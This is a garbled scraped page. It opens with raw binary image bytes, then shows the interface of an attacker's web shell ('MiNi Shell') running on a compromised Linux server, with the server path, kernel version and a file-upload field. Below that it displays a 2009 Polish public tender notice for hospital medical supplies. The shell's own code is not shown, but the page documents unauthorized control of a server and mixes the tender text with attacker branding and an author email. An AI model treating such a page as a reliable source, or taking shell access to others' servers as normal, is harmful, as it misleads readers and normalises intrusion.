JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090604/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090604/87991-N-2009.html

<p class="kh_header"><b>Sosnowiec: Sukcesywna dostawa materiałów medycznych dla Szpitala Instytutu Medycyny Pracy i Zdrowia Środowiskowego w Sosnowcu</b><br>
<b>Numer ogłoszenia: 87991 - 2009; data zamieszczenia: 04.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Medycyny Pracy i Zdrowia Środowiskowego , ul. Kościelna 13, 41-200 Sosnowiec, woj. śląskie, tel. 032 2660885, faks 032 2661124.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.imp.sosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Rozwojowo- Badawcza.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa materiałów medycznych dla Szpitala Instytutu Medycyny Pracy i Zdrowia Środowiskowego w Sosnowcu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pakiet 1. 


MATERIAŁY JAŁOWE

L.p.	Asortyment	Zapotrzebowanie roczne
1.	Strzykawka Janeta 100ml jał.	250 szt.
2.	Strzykawka 20 ml x 100 szt. jał.	200 op.
3.	Strzykawka 5 ml x 100 szt. jał.	200 op.
4.	Strzykawka 10 ml x 100 szt. jał.	250 op.
5.	Strzykawka 2 ml x 100 szt. jał.	150 op.
6.	Strzykawka do pompy infuzyjnej 50ml jał	1500 szt.
7.	Strzykawka insulinówka 1 ml x 100 szt. jał	15 op.
8.	Igła do  iniekcji nr 0,9 x 100 szt. jał	200 op.
9.	Igła do iniekcji nr 0,3 x 100 szt. jał.	10 op.
10.	Igła do iniekcji nr 0,8 x 100 szt. jał	200 op.
11.	Igła do iniekcji nr 1,1 x 100 szt. jał	200 op.
12.	Igła do nakłuć lędżwiowych 1,2 x 90mm jał	25 szt.
13.	Kaniula doż 0,8 - 1,2 jał	5000 szt.
14.	Pleuracan-zestaw do drenażu opłucnej jał	5 szt.
15.	Zestaw do punkcji pęcherza moczowego typu bard jał	5 szt.
16.	Igła do iniekcji x 100 szt. 0,6 jał.	10 op.
17.	Igła do iniekcji x 100 szt. 0,7 jał	50 op.
18.	PRZYRZĄD DO WIELOKROTNEJ ASPIRACJI PŁYNU Z FILTREM PRZECIWBAKTERYJNYM JAŁOWY. Wymagania techniczne: plastikowy kolec z dwoma kanałami infuzyjnymi i powietrznymi, plastikowa płytka umożliwiająca łatwe wprowadzenie do butelki, filtr bakteryjny 0,45um, zabezpieczenie przed przypadkowym zakażeniem miejsca łączenia aparatu ze strzykawką przy otwartej zatyczce, samozamykająca zatyczka zamykająca aparat.	1000 szt.
19.	Przedłużacz do pomp infuzyjnych jał	1000 szt.
20.	Zestaw do nitrogliceryny do pomp infuzyjnych jał. nieprzepuszczający światła 20 kr/ml, długość 107/272cm, filtr powietrza 3 mikrony, filtr w linii 15 mikronów	150 szt.
21.	Przyrząd do przetaczania krwi i jej preparatów .jałowy	100 szt.
22.	Przyrząd do przetaczania płynów infuzyjnych jał	25000 szt.
23.	ZESTAW UNIWERSALNY DO POMP INFUZYJNYCH JAŁOWY, 20kr.ml, DŁUGOŚĆ104 264, FILTR POWIETRZA 3 MIKRONY, FILTR W LINII 15 MIKRONÓW	250 szt.
24.	Rękawice 6,5,-8 jał.	2000 par
25.	Cewnik do odsysania górnych dróg oddechowych nr.12,14,16jał.	10000 szt.
26.	Cewnik do podawania tlenu przez nos jał	300 szt.
27.	Cewnik urologiczny Foleya ch/f12, ch/f14, ch/f 16,20	300 szt.
28.	Przewód do ssaka z łącznikiem jał.	1000 szt.
29.	Dren tlenowy 4,26m jał	1200 szt.
30.	Igła iniekcyjna 1,2 x 100 szt. jał.	15 op.
31.	Łącznik martwa przestrzeń jał.	300 szt.
32.	Zatyczka do cewników jał.	500 szt.
33.	Zgłębnik dwunastniczy jał	10 szt.
34.	Zgłębnik żołądkowy ch 18 jał	30 szt.
35.	Zgłębnik żołądkowy ch 20 jał	30 szt.
36.	Zgłębnik żołądkowy ch 22 jał	30 szt.
37.	Zgłębnik żołądkowy ch 24 jał	30 szt.
38.	Zgłębnik żołądkowy ch 25 jał	30 szt.
39.	Zgłębnik żołądkowy ch 26 jał	30 szt.
40.	Zgłębnik żołądkowy ch 30 jał	30 szt.
41.	Zgłębnik żołądkowy ch 32 jał	30 szt.
42.	Zgłębnik żołądkowy ch 36 jał	30 szt.
43.	Strzykawka 20 ml do pomp infuzyjnych 	250 szt.
44.	Cateter 1,1 x 1,7mm/16 G, dł 45 cm,przepływ 36ml/min jał.typu Cavafix	300 szt.
45.	Kanka doodbytnicza H24 jał	20 szt.
46.	Koreczek do venflonów jał.	2000 szt.
47.	Kranik trójdrożny jał	600 szt.
48.	Maska do tlenu dla dorosłych jał	1500 szt.
49.	Ostrza chirurgiczne nr 25 jał	500 szt.
50.	Pinceta sterylna	500 szt.
51.	Worek do zbiórki moczu jałowy dla dorosłych	500 szt.
52.	Strzykawka 1 ml z igłą do tuberkuliny x 100 szt.	25 op.
53.	OBWÓD STERYLNY DO RESPIRATORA Z GAŁĘZIĄ GŁADKI WEWNĘTRZNIE, DŁUGOŚĆ 180 CM. WYPOSAŻONY W TRÓJNIK Y Z DWOMA PORTAMI I KOLANKO Z PORTEM LUER LOCK , PUŁAPKA WODNA. GAŁĄŹ DŁ. 60CM, ŁĄCZNIK 22/22	100 szt.
54.	Prowadnica intubacyjna jałowa	100 szt.
55.	Rurka ustno gardłowa nr 2,3, 4 jał.	1000 szt.
56.	Lancet do testów Prick x 1000 szt.	5 op.
57.	Rurka intubacyjna nr 7, 8,9 jał	150 szt.
58.	Rurka tracheostomijna jał. nr 7,8,9	30 szt
59.	FILTR MECHANICZNY  HYDROFOBOWY STERYLNY. SPRAWNOŚĆ W ŚRODOWISKU WILGOTNYM 100%. OBJĘTNOŚĆ FILTRA 35 ML +/-5% . DŁUGOŚĆ UŻYCIA PRZY PACJENCIE 24 GODZINY.	300 szt.
60.	FILTR MECHANICZNY HYDROFOBOWY STERYLNY. SPRAWNOŚĆ W ŚRODOWISKU WILGOTNYM 100%. OBJĘTOŚĆ FILTRA 85 ML +/-5% DŁUGOŚĆ UŻYCIA PRZY PACJENCIE 48 GODZIN.	100 szt.
61.	Igła typu motylek x 50 szt.	10 op.
62.	Szpatułki drewniane jał. do wymazów 100 szt.	5 op.
63. 	Igła do iniekcji x 100 szt. 0,5 jał.	20 op.

Pakiet 2. 


OPATRUNKI

L.p.	Asortyment	Zapotrzebowanie roczne
1.	Gaza niejałowa	500 mb
2.	Kompresy gazowe jałowe 10 x1 0 cm x 3 szt.	200 op.
3.	Kompresy gazowe niejałowe 10 x 10 cm x 100	1000 op.
4.	Nici chirurgiczne 2/0 x 36	1 op.
5.	Opaska elastyczna 4 m x 15 cm	10 szt.
6.	Opaska gazowa 4 m x 10 cm	30000 szt.
7.	Plastry hypoalergiczne	250 szt.
8.	Poloplastr 1,25 x 5 m	500 szt.
9.	Poloplastr 2,5 cm x 5 m	500 szt.
10.	Poloplastr 5 cm x 5 m	200 szt.
11.	Polyskin x 200 szt.	3 op.
12.	Prestoplastr 10 cm x 6 cm x 100 szt.	6 op.
13.	Vena-Plast x 50 szt.	100 op.
14.	Wata celulozowa x 5 kg	350 op.
15.	Wata opatrunkowa x 0,5 kg	10 op.
16.	Opatrunki hydrokoloidowe 12 cm x 24 cm	5 szt.
17.	Kompresy jał. 5 cm x 5 cm x 3 szt.	250 op.
18.	Opatrunek na rany jał. Absorbujący 7,2 cm x 5cm x 50 szt.	15 op.
19.	Pieluchomajtki rozm. Mx 30 szt.	1 op.
20.	Pieluchomajtki rozm. Lx 30 szt.	1 op.
21.	Sterylny, samoprzylepny opatrunek na ranę pooperacyjną 
z absorbcyjną , nieprzywierającą warstwą chłonną, nasączoną płynem przeciwdrobnoustojowym PHMB, rozmiar 10 x 12,5 cm x 25 szt.	1 op.
22.	Antybakteryjna gąbka opatrunkowa do drenów i cewników dożylnych, nasączona płynem PHMB 5 x 5 cm x 70 szt.	1 op..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium  w wysokości 
Pakiet 1- 2000 zł
Pakiet 2- 2000 zł.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy, którzy:
a)   posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy       nakładają obowiązek posiadania takich uprawnień,
b)  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym 
i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych 
do wykonania zamówienia,
c)	znajdują się w sytuacji ekonomicznej i finansowej gwarantującej sprawną realizację   zamówienia,
d)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust.1 i 2 ustawy Pzp.
Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie dokumentów załączonych do oferty metodą spełnia/niespełna..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 2. Do oferty należy dołączyć następujące dokumenty i oświadczenia:
a) Oświadczenie potwierdzające wiarygodność oferenta na podstawie art. 22 ust. 2, 
 na formularzu stanowiącym załącznik nr 5 do niniejszej specyfikacji.

b) Aktualny odpis z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej potwierdzający, że profil działania oferenta odpowiada przedmiotowi zamówienia. Dokument uważa się za aktualny w przypadku jego wystawienia lub potwierdzenia przez organ wydający nie wcześniej, niż 6 miesięcy przed upływem terminu składania ofert.

c) Zaświadczenia z właściwego urzędu skarbowego oraz z właściwego oddziału Zakładu Ubezpieczeń Społecznych potwierdzające, że oferent nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie społeczne lub że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności. Zaświadczenia uważa się 
za aktualne, jeśli zostały wystawione nie wcześniej, niż 3 miesiące przed upływem terminu składania ofert.
d) Oświadczenie, że oferent zapoznał się z warunkami zamówienia i załączonym wzorem umowy oraz, że przyjmuje ich treść bez zastrzeżeń - zgodnie z załącznikiem nr 4 do SIWZ
e)	Aktualne dokumenty dopuszczające do obrotu i używania asortyment objęty zamówieniem- zgodnie z ustawą o wyrobach medycznych z dnia 20.04.2004 roku (Dz. U. Nr 93 poz. 896 z późn. zm.)

Dokumenty o których mowa powyżej mogą być przedstawione w formie oryginału albo kserokopii poświadczonej za zgodność z oryginałem przez osobę podpisującą ofertę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.imp.sosnowiec.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w Sekretariacie Głównym IMPiZŚ pok. 103, po uprzednim uiszczeniu opłaty 50 zł. w kasie IMPiZŚ pok.108.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.06.2009 godzina 11:00, miejsce: Sekretariacie Głównym IMPiZŚ pok. 103, ul. Kościelna 13, 41- 200 Sosnowiec.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com